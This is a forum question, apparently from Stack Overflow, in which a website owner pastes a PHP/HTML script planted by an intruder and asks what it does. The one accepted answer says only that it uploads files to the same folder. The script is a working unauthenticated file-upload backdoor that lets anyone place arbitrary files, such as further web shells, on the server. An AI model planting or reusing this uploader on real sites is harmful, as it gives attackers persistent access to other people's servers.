# Hacker installed this script on my website

Tags: php, html, cpanel

Some hacker or bot installed this script on my website. I do not know much about software development. Can some share with me what the affects are of how this code interacts with my cpanel?

```html
<head>
<style>
<!--
p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}-->
</style>
</head>

<table style="BORDER-COLLAPSE: collapse" cellspacing="0" bordercolordark="#666666" cellpadding="5" height="1" width="100%" bgcolor="#000000" bordercolorlight="#c0c0c0" border="1">
 <tr>
  <a bookmark="minipanel" style="font-weight: normal; color: #009900; font-family: verdana; text-decoration: none">
  <td width="50%" height="1" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px">
  <center>Upload<form method="POST" enctype="multipart/form-data">
   <input type="hidden" name="act" value="upload" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #009900">
   <input type="file" name="userfile" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #009900"><input type="hidden" name="miniform" value="1" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #009900">
   <input type="submit" name="submit" value="Upload" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #009900"><br><br>
   <?php
$uploaddir = "";
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (isset($_FILES['userfile']['name'])) {
        if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
                echo "The file ". basename($_FILES['userfile']['name']) ." has been uploaded";
        } else {
                echo "There was an error uploading the file. please try again!";
        }
}
?>
  </form>
  </center></td>
 </tr>
</table>
</a>
```

Answer (score 0, accepted):

It seems this code will upload file in same folder where this file is uploaded.